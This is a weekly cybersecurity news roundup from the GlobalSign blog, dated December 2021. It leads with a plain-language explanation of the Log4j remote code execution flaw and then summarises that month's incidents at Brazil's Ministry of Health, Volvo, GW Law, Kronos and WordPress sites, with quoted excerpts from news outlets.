Hello and welcome back to the GlobalSign blog!
This week everyone is talking about the Log4J vulnerability.
What is the Log4J vulnerability? As F5Labs explains in this article published on December 12, Log4J is a vulnerability that was discovered in a piece of free, open source software called log4j. It’s used by thousands of websites and applications, to perform functions such as logging information for use by that website's developers, for debugging and other purposes.
This particular software has a previously undiscovered security vulnerability where data sent to it through that website — if it contains a special sequence of characters — results in log4j automatically fetching additional software from an external website and running it. If a cyberattacker exploits this, they can make the server that is running log4j run any software they want — including software that can completely take over that server – A.K.A. a Remote Code Execution (RCE) attack.
The consequences of the vulernability are severe enough for WIRED to describe the situation in this article as ‘The Internet Is on Fire’. Ars Technica adds that “The list of services with Internet-facing infrastructure that is vulnerable to a critical zero-day vulnerability in the open source Log4j logging utility is immense and reads like a who’s who of the biggest names on the Internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu.”
Until the vulerability is dealt with, cyber criminals can steal both money and data.
Working around the clock are volunteers from the Apache Foundation since Log4j is a Java-based logging utility and is part of the Apache Logging Services, a project of the Apache Software Foundation. The Wall Street Journal spoke with one of the volunteers in this piece (link is also below.)
In non-Log4J news…
- Brazil's Ministry of Health has suffered a second cyberattack in less than a week, which has compromised various internal systems, including the platform that holds COVID-19 vaccination data.
- Volvo Cars has confirmed a limited amount of its research and development property was stolen when a third party illegally accessed one of its file repositories. There may have been an impact on the company's operation, officials confirmed in a disclosure shared on Dec. 10. After detecting the breach, Volvo implemented countermeasures, including steps to prevent further access to its property, and alerted authorities.
- George Washington University’s law school has been dealing with a third-party vendor “compromise,” which left students unable to access materials and previous assignments during exams.
- HR software provider Kronos was hit by a ransomware attack last weekend that resulted in an outage of its UKG Workforce Central, UKG TeleStaff, Healthcare Extensions, and Banking Scheduling Solutions services. A company VP says it may take "up to several weeks" for the systems supporting those services to come back online.
- Researchers at security firm Wordfence Security say as many as 1.6 million WordPress sites have been targeted by an active large-scale attack campaign originating from 16,000 IP addresses by exploiting weaknesses in four plugins and 15 Epsilon Framework themes. They report seeing more than 13.7 million different attack attempts over a 36-hour period, all of which focus on exploiting four different WordPress plug-ins and several Epsilon framework themes.
That’s a wrap for the week. Thanks again for stopping by our blog, and have a great weekend!
Top Global Security News
CRN (December 15, 2021) Nation-State, Ransomware Groups Using Log4j Bug In Attacks
"A variety of state-sponsored threat actors, ransomware groups and ransomware access brokers have begun leveraging the Log4j vulnerability in active attacks, Microsoft and other IT vendors reported.
The Redmond, Wash.-based software giant said Tuesday that government-backed adversaries in China, Iran, North Korea, and Turkey have exploited the Log4j bug against targets to further the hackers’ objectives. Nation-state activity associated with the Log4j flaw ranges from experimentation during development to integrating the vulnerability into in-the-wild payload development, Microsoft said.
Microsoft specifically called out Iranian ransomware group Phosphorus for acquiring, making modifications, and operationalizing modifications to the Log4j exploit. In addition, Microsoft said Chinese threat actor Hafnium has capitalized on Log4j to extend their typical targeting by attacking virtualization infrastructure."
Bleeping Computer (December 14, 2021) CISA orders federal agencies to patch Log4Shell by December 24th
"The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems against the critical Log4Shell vulnerability and released mitigation guidance in response to active exploitation.
This follows threat actors' head start in scanning for and exploiting Log4Shell vulnerable systems to deploy malware.
"CISA urges organizations to review its Apache Log4j Vulnerability Guidance webpage and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately," the cybersecurity agency said."
ZDNet (December 14, 2021) Brazilian Ministry of Health hit by second cyberattack in less than a week
"Brazil's Ministry of Health has suffered a second cyberattack in less than a week, which has compromised various internal systems, including the platform that holds COVID-19 vaccination data.
The news emerged after a first major ransomware attack three days earlier, from which the department was still recovering. Confirming the second attack on Monday (13) evening, health minister Marcelo Queiroga said the latest event, which took place in the early hours of that same day, was smaller than the first attack.
According to Queiroga, the department is working to recover the systems as soon as possible. However, he said the second attack means ConecteSUS, the platform that issues COVID-19 vaccine certificates, would not be back online today (14) as originally planned."
EdScoop (December 14, 2021) Third-party 'compromise' interrupts GW law students' exam prep
"George Washington University’s law school is managing the fallout from a third-party vendor “compromise,” which left students unable to access materials and previous assignments during exams.
Some take-home assignments could have been lost in the MyLaw platform outage on Friday, as well as some personal information like course schedules, the GW Hatchet, the independent student newspaper, reported Monday. The outage isn’t affecting the exam schedule, GW Law Dean Dana Bowen Matthew said in a video message to students posted by the Hatchet. In the message, Bowen Matthew did not refer to the outage as an attack, but just stated that the MyLaw platform was compromised.
The department is investigating the outage and working with the vendor to bring it back up, according to the GW information technology website. IT is also working on an outage related to a ransomware attack on the payroll system provider Kronos, which is affecting the university systems."
Dark Reading (December 13, 2021) Kronos Suffers Ransomware Attack, Expects Full Restoration to Take 'Weeks'
"Kronos Private Cloud was hit by a ransomware attack over the weekend that resulted in an outage of the HR services firm's UKG Workforce Central, UKG TeleStaff, Healthcare Extensions, and Banking Scheduling Solutions services.
Kronos executive vice president Bob Hughes said in a post that it may take "up to several weeks" for the systems supporting those services to come back online, so customers should "evaluate and implement alternative business continuity protocols related to the affected UKG solutions."
Kronos' UKG Pro, UKG Ready, UKG Dimensions, and other UKG products outside its Private Cloud offerings were not hit in the attack."
Dark Reading (December 13, 2021) Volvo Confirms R&D Data Stolen in Breach
"Volvo Cars has confirmed a limited amount of its R&D property was stolen when a third party illegally accessed one of its file repositories.
There may have been an impact on the company's operation, officials confirmed in a disclosure shared on Dec. 10. After detecting the breach, Volvo implemented countermeasures, including steps to prevent further access to its property, and alerted authorities."
OTHER INDUSTRY NEWS
Global Fight Against Log4j Vulnerability Relies on Apache Volunteers - Wall Street Journal Pro (Requires subscription)